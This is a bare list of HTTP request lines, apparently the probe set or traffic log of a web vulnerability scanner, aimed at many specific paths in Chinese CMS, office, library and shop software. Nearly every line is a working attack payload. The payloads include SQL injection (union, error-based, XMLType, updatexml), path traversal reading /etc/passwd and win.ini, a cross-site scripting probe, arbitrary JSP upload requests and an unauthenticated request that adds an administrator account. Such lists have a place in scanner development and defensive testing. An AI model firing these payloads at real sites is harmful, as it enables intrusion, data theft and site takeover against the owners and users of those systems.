GET /message/mytreedata.asp?bumenid=-12%20AND%201432=CONVERT(INT,(SELECT%20CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100)))--%20&time=&time=
POST /house/upload/upload.asp
POST /sbweb/Upload_Save_2.asp
GET /feReport/chartList.jsp?delId=1&reportId=1%20and%201122=CONVERT(INT,(SELECT%20char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100)))%20--
GET /jsearch/admin/opr_forcechangepwd.jsp
GET /home/front/search/opr_chatsearch.jsp?action=simplesearch&words=1%25%27%20union%20all%20select%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2Cchr%28119%29%7C%7Cchr%28101%29%7C%7Cchr%2898%29%7C%7Cchr%28115%29%7C%7Cchr%2899%29%7C%7Cchr%2897%29%7C%7Cchr%28110%29%7C%7Cchr%2858%29%7C%7Cchr%28105%29%7C%7Cchr%2858%29%7C%7Cchr%28102%29%7C%7Cchr%28105%29%7C%7Cchr%28110%29%7C%7Cchr%28100%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20DUAL%20--
POST /celive/live/index.php?action=1
GET /admin/Site/AddDomain.aspx?Edit=1&id=1000/**/%20/**/union/**/%20/**/all/**/%20/**//**/SELECT/**/%200,/**/CHAR(106)%2bCHAR(106)%2bCHAR(106),0,0,'',0,2014,0/**/FROM/**/%20ZL_Manager
GET /baseNews_view.jsp?newsId=-12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20--
POST /Lesktop/command.aspx
GET /Lesktop/Management/DeptEdit.aspx?did=1%20and%20char(106)%3E0
POST /Lesktop/sendfile.aspx
GET /Office_Supplies/Goods_Main.aspx?type=1&info_id=1/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
GET /Personnel/Infomation.aspx?userid=1/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
GET /Personnel/VacationComputation.aspx?id=11/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
GET /RCMANAGE_New/rcgl.aspx?UID=11/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
GET /ObjSwitch/HYTZ.aspx?userid=11/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
GET /modules/pdflist.aspx?info_id=1/**/union/**/all/**/select/**/null,null,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),null,null,null/**/from/**/dual%20--
GET /jcms/m_5_e/init/sitesearch/opr_classajax.jsp?classid=1%20union%20all%20select%2012,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20from%20dual%20--
GET /lm/sys/opr_secsetorder.jsp?parentid=1%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x7e,md5(1122),0x7e),NULL,NULL,NULL,NULL
GET /lm/sys/opr_secsetorder.jsp?parentid=1%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL%23
GET /jcms/jcms_files/jcms1/web2/site/module/comment/opr_readfile.jsp?filename=opr_readfile.jsp
GET /managerNManager.action
GET /lm/manage/opr_setappraisal.jsp?fn_billstatus=E&vc_setapprid=-2087%20UNION%20ALL%20SELECT%20CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),NULL,NULL,NULL%20FROM%20DUAL--
GET /jcms/m_1_9/column/getgroupuser.jsp?jgid=1'%20UNION%20ALL%20SELECT%20NULL,CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100)%20--&spell=2&webid=3&userid=4
GET /lm/sys/opr_bulletin_show.jsp?vc_id=1'%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL%20--
GET /lm/front/mailpublist.jsp?editpagename=/../../../../../../../../../../../../../etc/passwd%00.ftl
GET /jcms/workflow/design/opr_model_class.jsp?fn_billstatus=E&vc_id=1'%20UNION%20ALL%20SELECT%20NULL,CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100),NULL,NULL,NULL%20--
GET /jcms/m_5_5/m_5_5_1/objectbox/selectx_search.jsp?spell=1%25%27%20union%20all%20select%20null%2Cchr%28119%29%7C%7Cchr%28101%29%7C%7Cchr%2898%29%7C%7Cchr%28115%29%7C%7Cchr%2899%29%7C%7Cchr%2897%29%7C%7Cchr%28110%29%7C%7Cchr%2858%29%7C%7Cchr%28105%29%7C%7Cchr%2858%29%7C%7Cchr%28102%29%7C%7Cchr%28105%29%7C%7Cchr%28110%29%7C%7Cchr%28100%29%20from%20dual%20--
GET /lm/manage/opr_mailinfo_getsecproperty.jsp?vc_bgmailproperty=1'%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20DUAL%20--
GET /lm/manage/opr_mailinfo_getsecproperty.jsp?vc_bgmailproperty=1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x7e,0x7765627363616E3A693A66696E64,0x7e)%23
GET /lm/front/mailwrite_over.jsp?editpagename=/../../../../../../../../../../../../../etc/passwd%00.ftl
GET /admini/question/question.aspx?ID=25'%20and%20char(106)%2bchar(106)%3E0%20--
GET /ModifyNewsAction.do?newsID=-12
GET /plugins/qmail/MailTo.aspx?mail=1%27and%02CHAR(106)%2bCHAR(39)%3E0%02and%02%271%27=%271
POST /manage/Template/DSManage.aspx
GET /index.php?id=product&c=project&cate=1&ext[id%3C0%20union%20select%20111,2,3,4,5,6,md5(1122),8,9%20,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--]=1
GET /api.php?id=_arclist&c=api&f=phpok&param[pid]=41&param[notin]=41)%20Union%20Select%201,md5(1122),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--%20
GET /admin/admin_adminmodifypwd.aspx
GET /jcms/m_5_6/ajax_printcol.jsp?cataid=1)%20UNION%20ALL%20SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)%20--
GET /feform/createprinttemplete.jsp?formid=1'%20AND%204321=CONVERT(INT,(SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)))%20--
GET /fenc/syncsubject.jsp?pk_corp=1'%20AND%202047=CONVERT(INT,(SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)))%20--
GET /indexsearch/filter.jsp?tableId=1%20AND%202047=CONVERT(INT,(SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)))%20--
GET /Modules/jycg/SFDB.aspx?sfpjnm=-12'%20UNION%20ALL%20SELECT%20NULL,NULL,CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116),NULL%20--&type=1
GET /print/search_print_proof.jsp?proof_no=just_sql_test'
POST /include/user/mulbumentree.asp
POST /include/user/usertree.asp
GET /include/zidian/dantree.asp?ZiDian='%20AND%204321%3DCONVERT%28INT%2C%28SELECT%20CHAR%28106%29%2bCHAR%28117%29%2bCHAR%28115%29%2bCHAR%28116%29%2bCHAR%2895%29%2bCHAR%28116%29%2bCHAR%28101%29%2bCHAR%28115%29%2bCHAR%28116%29%29%29%20--
POST /public/oa_nodebanliren_frm.asp
POST /include/chaxundetail.asp
POST /include/user/bdtreemx.asp
POST /admin/Fileup.aspx?path=notice/upload
GET /plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20UNION%20SELECT%201,2,3,md5%281122%29,5,6,7,8,9%23
GET /inc/guestbook.php?do=guestbook&t=ajax&mid=1&content=testtesta%E9%8C%A6%27,(select%20concat%280x7c,md5%281122%29,0x7c%29from%20job_admin%20limit%201%29,NOW%28%29,1,1,3,1,if%281=2,1,char%28@%60%27%60%29%29%29%23@%60%27%60
POST /index.php?act=ajax&do=datacall&in_ajax=1&m=index&op=get_datacall
GET /hlp/help.asp?HlpCode=1'%20and%201=char(106)%20--
GET /Code/Common/SysCommonAttach.aspx?Method=GetNewID&IDs=isTrans&tabRecordId=1%27%20AND%201%3DCHAR%28106%29%20--
GET /ModifyNewsAction.do?newsID=-12'%20and%20(select%201%20from%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a);%20%23
GET /piw/Site/KeyWordExport.jsp?ids=-111)%20union%20select%20Username,md5%281122%29,222,4444,5555%20from%20zduser%23
GET /schedule/Entrust.aspx?nidlist=0,1)/**/and/**/1=CHAR(106)%20--
POST /common/mod/ajax.ashx
GET /SSSweb/SuggestionCollection/PostSuggestion.aspx?ID=-1'%20and%201=char(106)%20--
POST /dakai.aspx
GET /SSSweb/SuggestionCollection/PostSuggestion.aspx?ID=3'%20and%201=char(106)%20--
GET /Permission/Application_Query_List.aspx?deptName=3'%20and%201=char(106)%20--
GET /main/model/childcatalog/zxzxinfo.jsp?MailId=13%20UNION%20ALL%20SELECT%20NULL,CHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2859%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29,NULL,NULL,NULL,NULL,NULL,NULL%20--
GET /index_page/geren_list_page.aspx?server=1&refid=1'%20AND%201=CHAR(106)%2bCHAR(60)%20--
GET /website/level3.jsp?tablename=7&infoid=-1'%20UNION%20ALL%20SELECT%20CHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2859%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29--
GET /varset/modifyTime.asp?varname=&id=495'%20union%20all%20select%201,2,3,0x66696E643A76756C,5,6,7,8,9%20from%20teachers%20--
POST /getpassword.php?do=login
GET /api/uc/uc.php?code=380dDbp0QmFDGmUR2ENTw7v%2B1YVER%2BKFyWB3YQN0OARXAr%2BIV4p1g3Ou5yA2CG6k%2BYdUOSb%2BwsiMwU4aqz2Gmtae60ut%2Fw
GET /servlet/FileDownload?filepath=c:/windows/win.ini&dispname=42873.txt
GET /servlet/FileDownload?filepath=/etc/passwd&dispname=42873.txt
POST /index.php?m=register&c=ajax_reg
GET /api/uc.php?code=8e347f1oWfxZ5isPSs7QBbA78aaJwxZCvdIIfY2niRLsrqrg0dHBfrkRSaOtzGxkncaWtRGPVKjVbHwZJSlI1JFH9WBN5wj%2Fsqj2Xg
GET /witapprovemanage/apprvaddNew.jsp?flowid=%27%20and%201=2%20UNION%20SELECT%201,2,3,4,char(106)%2bchar(60),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29;--%20-
GET /nicknamelogin.jsp
GET /jsearch/viewsnap.jsp?snapname=/../../../../../../../../../../../../../etc/passwd
GET /lm/objectbox/selectx_groupuserlist.jsp?vc_parid=-42873%27+or+%271%27=%271
POST /index.php?m=register&c=ajax_reg
GET /inc/ajax.asp?action=videoscore&id=1%20and%201=2%20union%20select%20CHR(106),CHR(99),3%20from%20%7Bpre%7Dmanager
GET /ajaxfs.php?tooltip=5254'%20and%20(select%201%20from%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a);%20%23
GET /utilities.php?tail_lines=50&message_type=-1&go.x=10&go.y=9&refresh=20&reverse=1&filter=%22%3E%25%3Cscript%3Eprompt(42873)%3C/script%3E&page=1&action=view_logfile
POST /?q=node&destination=node
GET /UtilServlet?name=-1'%20UNION%20ALL%20SELECT%20NULL,%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)--%20&operation=getUserInfo&time=12
POST /jcms/m_5_e/module/individuation/opr_individuation_unit.jsp?fn_billstatus=B&sub_row=just_test
HEAD /govdiropen/jcms_files/jcms1/web1/site/zfxxgk/download/downannals.jsp?name=..././..././..././..././..././..././WEB-INF/ini/merpserver.ini&webid=1&type=1&downname=just_test.txt
GET /down.aspx?id=(select%20convert(int,(select%20char(106)))%20FROM%20syscolumns)
POST /api/CheckMemberLogin.ashx?type=mobileisexist
GET /comm/showpic.php?pic=aHR0cDovL3d3dy5zby5jb20vcm9ib3RzLnR4dA%3D%3D
POST /LoginCheck.aspx
GET /NodeProdCategory.aspx?action=GetChildNode&CategoryId=(SELECT%20CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100))
GET /index.php?c=api&m=data&auth=finecms&param=action%3Dcache%20name%3DSPACE-MODEL.1%27%5D%3Bprint%28md5%281122%29%29%3B%2f%2f
GET /Book/user_read.jsp?classId=1'%20and%20(select%201%20from%20%20(select%20count(*),concat(0x3E7765627363616E3A66696E643C,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%20and%20'at'='at
GET /show.jsp?id=5'%20and%20(select%201%20from%20%20(select%20count(*),concat(0x3E7765627363616E3A66696E643C,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%20AND%20'AT'='AT
GET /NTRdrS_RegistInfo.aspx?BookRecno=1'%20AND%209211=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20AND%20'AT'='AT
GET /NTRdrBookRetrInfo.aspx?BookRecno='%7C%7CCTXSYS.DRITHSX.SN(user,(select%20chr(106)%7C%7Cchr(106)%7C%7Cchr(106)%7C%7Cchr(58)%7C%7Cchr(106)%7C%7Cchr(106)%7C%7Cchr(106)%7C%7Cchr(106)%20from%20DUAL))%7C%7C'
GET /NTRdrBookRetrInfo.aspx?BookRecno=18273&NewBIBNO=111%20AND%201122=(SELECT%20UPPER(XMLType(chr(60)%7C%7Cchr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)))%20FROM%20DUAL)&NEWBOOK=newbook
GET /NTBookRetrTopShowright.aspx?page=1&Index=6&LocLmt=&SrchTab=3&Acurate=3&Key='%7C%7CCTXSYS.DRITHSX.SN(user,(select%20CHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%20from%20DUAL))%7C%7C'&AllName=A++
GET /zfcgFrame/xx_look.aspx?ID=-1%27%20UNION%20ALL%20SELECT%20char%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29--%20
GET /AdminP
GET /lm/front/reg_2.jsp?sysid=/../../WEB-INF/web.xml%00%23
HEAD /public/download.asp?filename=../login2.asp/
GET /Isv.ashx?action=addadmin&adminuser=admin&adminpassword=111111&guid=1
GET /index.php?controller=block&action=goodsCommend&id=0)%20Union%20select%201,md5(1122)%23
POST /API/DownloadProducts.ashx
GET /Brand.aspx?pageIndex=1&sortOrderBy=VistiCounts%20Desc)%20AS%20RowNumber%20FROM%20vw_Hishop_BrowseProductList%20p%20WHERE%20SaleStatus%20=%201)%20T%20WHERE%201=1%20and%201=char(106)%20--
GET /ProductUnSales.aspx?keywords=uio%2527&tagIds=1_2))%20T%20WHERE%201=1%20and%201=(select%20char(106)%2bchar(106))%20--%20&pageIndex=1
GET /SubCategory.aspx?TagIds=1%20and%20char(106)%3E1
POST /MShop/Partial/SuppLogo
POST /ShoppingHandler.aspx
HEAD /bq/Data/BIData.zip
GET /jphoto/objectbox/selectx_search.jsp?spell=1%25%27%20UNION%20SELECT%20CHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2899%29%7C%7CCHR%2899%29%2Cnull%20FROM%20DUAL%20--
HEAD /vc/vc/columncount/downfile.jsp?filename=/etc/passwd&savename=webscan.txt
GET /jact/workflow/design/index.jsp?flowcode=a'%20UNION%20ALL%20SELECT%20CHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(58)%7C%7CCHR(107)%7C%7CCHR(109)%7C%7CCHR(108),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL%20--
GET /jis/manage/role/opr_approleinfo_user2.jsp?c_id=1'%20UNION%20ALL%20SELECT%20NULL,CHAR(101)%2bCHAR(102)%2bCHAR(58)%2bCHAR(104)%2bCHAR(103)%2bCHAR(58)%2bCHAR(105),NULL,NULL--%20
POST /cms/voteManager/voteaction.jsp
GET /EditPhotoHandle.aspx?Action=EditCover&PhotoId=(SELECT%20CHAR(106)%2bCHAR(107))
POST /ShopManage.aspx
GET /RegionHandle.aspx?action=GetChildNode&ParentId=(select%20%20(char(106)%2bchar(100)))
POST /SNS/Product/WaterfallProductListData
POST /ProSales/GetListCate
HEAD /jphoto/jphoto/sys/member/opr_export.jsp
POST /JwGl/jxjh/JxjhXGBc.asp
GET /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500-52-25-1.html
HEAD /defaultroot/site/templatemanager/downloadhttp.jsp?fileName=../index.jsp
GET /defaultroot/public/select_user/search_org_list.jsp?searchName=a%27%20UNION%20ALL%20SELECT%20CONCAT%280x23%2C0x7765627363616E3A693A66696E64%2C0x23%29%2CNULL%23
GET /defaultroot/govezoffice/gov_documentmanager/jigeObj.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(106)%2bCHAR(106)%2bCHAR(58)%2bCHAR(58)%2bCHAR(108)%2bCHAR(109)%2bCHAR(110),NULL,NULL,NULL,NULL,NULL,NULL--
GET /cjcx/xuesheng/czjl/shuru.asp?id=-28%20UNION%20ALL%20SELECT%20CHAR(106)%2bCHAR(106)%2bCHAR(106)%2bCHAR(58)%2bCHAR(58)%2bCHAR(100)%2bCHAR(100)%2bCHAR(60)%20--&xueke=
GET /cjcx/bkxt/yqts1.asp?newsid=(SELECT%20CHAR(113)%2bCHAR(104)%2bCHAR(101)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)%2bCHAR(118)%2bCHAR(109)%2bCHAR(99)%2bCHAR(58))
GET /cjcx/bkxt/xxpj.asp?id=(SELECT%20CHAR(113)%2bCHAR(104)%2bCHAR(101)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)%2bCHAR(118)%2bCHAR(109)%2bCHAR(99)%2bCHAR(58))
GET /cjcx/kagx/main3.asp?rjxk=dd'%20and%201=(CHAR(113)%2bCHAR(104)%2bCHAR(101)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)%2bCHAR(118)%2bCHAR(109)%2bCHAR(99)%2bCHAR(58))%20--&xqmc=%25&jsxm=&mc=&ktlx=&page=
POST /login.asp
POST /search.php
GET /LoginCheck4.asp?LoginLb=jwc&Account=1'%20AND%201=CHAR(106)%20--&PassWord=0
GET /jwgl/jxjh/jxjha.asp
POST /jwgl/jcxx/savetofile.asp
POST /public/jsp/livephotoupload.jsp?path=archives&mode=add&hiddenName=1.jsp&visualName=2.jsp
GET /Help.aspx?id=(SELECT%20CHAR(106)%2bCHAR(103)%2bCHAR(105)%2bCHAR(100))
POST /govezoffice/gov_documentmanager/senddocument_import.jsp?categoryId=1&path=archives&mode=add&fileName=1.jsp&saveName=2.jsp&fileMaxSize=0&fileMaxNum=100&fileType=jsp
GET /edoas2/edoas2_test.jsp
GET /Report/AjaxHandle/StationChoose/StationTree.ashx?STTP='KKK')%20AND%201587=CONVERT(INT,(CHAR(58)%2bCHAR(117)))%20--&RadioType=Radio_XZ&ReportID=Report22
POST /celive/live/header.php
GET /SystemManage/AjaxHandle/AjaxVertifyUserID.ashx?uid=1'%20AND%201=CHAR(106)%20--
HEAD /skywcm/webpage/download.jsp?absolutePath=C:%5Cwindows%5Cwin.ini&downFileName=win.ini
GET /RdrRInforDetail.aspx?page=1&Index=4&KeyWord=AA'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(103)%7C%7CCHR(102)%7C%7CCHR(103)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(106)%7C%7CCHR(107)%7C%7CCHR(55)))%20FROM%20DUAL)%20--&name=r_infor&AcqSys=CN
GET /m/info/top_rating.action?clsNo=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(103)%7C%7CCHR(102)%7C%7CCHR(103)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(106)%7C%7CCHR(107)%7C%7CCHR(55)))%20FROM%20DUAL)%20AND%20'at'='at
GET /BaseCourse/RushTeamCollect.aspx?adcd=1&key=1%25'%20AND%20CHAR(106)%2bCHAR(109)%2bCHAR(106)%3E0--
GET /Plan/FloodPlan/FileEdit.aspx?id=1'%20AND%20CHAR(106)%2bCHAR(109)%2bCHAR(106)%3E0--
GET /BaseCourse/FloodDisastersQueryContent.aspx?areacode=1&DirTypeDetailId=1%20AND%20CHAR(106)%2bCHAR(109)%2bCHAR(106)%3E0--&Name=1
GET /Disaster/Reporting/ReportingDetail.aspx?ID=1'%20AND%203=CHAR(101)%2bCHAR(105)%2bCHAR(106)%20--
GET /Disaster/Reporting/ReportingInfo.aspx?oper=update&ID=1'%20AND%203=CHAR(101)%2bCHAR(105)%2bCHAR(106)%20--
GET /Duty/AjaxHandle/Jquery.autocomplete/AutocompleteContactByName.ashx?_=&q=313%25'%20AND%203=CHAR(106)%2bCHAR(99)%20--&limit=10&timestamp=
GET /plan/FloodPlan/FloodPlanFileShow.aspx?ReadOnly=&ID=499'%20AND%203=CHAR(106)%2bCHAR(99)%20--&filetype=156&ParentID=0&adomParameter=292
GET /admin/admin_database.aspx
GET /flex/newsmessage.jsp?uname=-1122'%20AND%2012=(SELECT%20CHAR(99))%20--
GET /video/videoView.jsp?videoid=250%20AND%201=(SELECT%20CHAR(106)%2bCHAR(58))
GET /blue_show.aspx?paperName=hehe'%20and%201=(select%20char(106))%20--&qnum=20
GET /?m=product&s=list&key=12'%20and%201=(updatexml(1,concat(0x5e24,(select%20md5(1122)),0x5e24),1))%23
GET /search.do?searchInfo=12'%20and%201=(updatexml(1,concat(0x5e24,(select%20md5(1122)),0x5e24),1))%20%23
GET /ModifyNewsAction.do?newsID=364'%20and%201=(updatexml(1,concat(0x5e24,(select%20md5(1122)),0x5e24),1))%20%23
GET /navigate.do?method=getPolicyinfoDataById&id=2631&menuNo=05'%20and%201=(select%20char(106))%20--
GET /model/TwoGradePage/Equipment_detail.aspx?id=11314%20and%201=(select%2bchar(106))%20--
GET /model/TwoGradePage/TrainSignUp.aspx?tblApparatusRepertoryListID=12%20and%201=(select%2bchar(106))%20--
GET /model/TwoGradePage/newsdetail.aspx?id=279&columnId=70%20and%201=(select%2bchar(106))
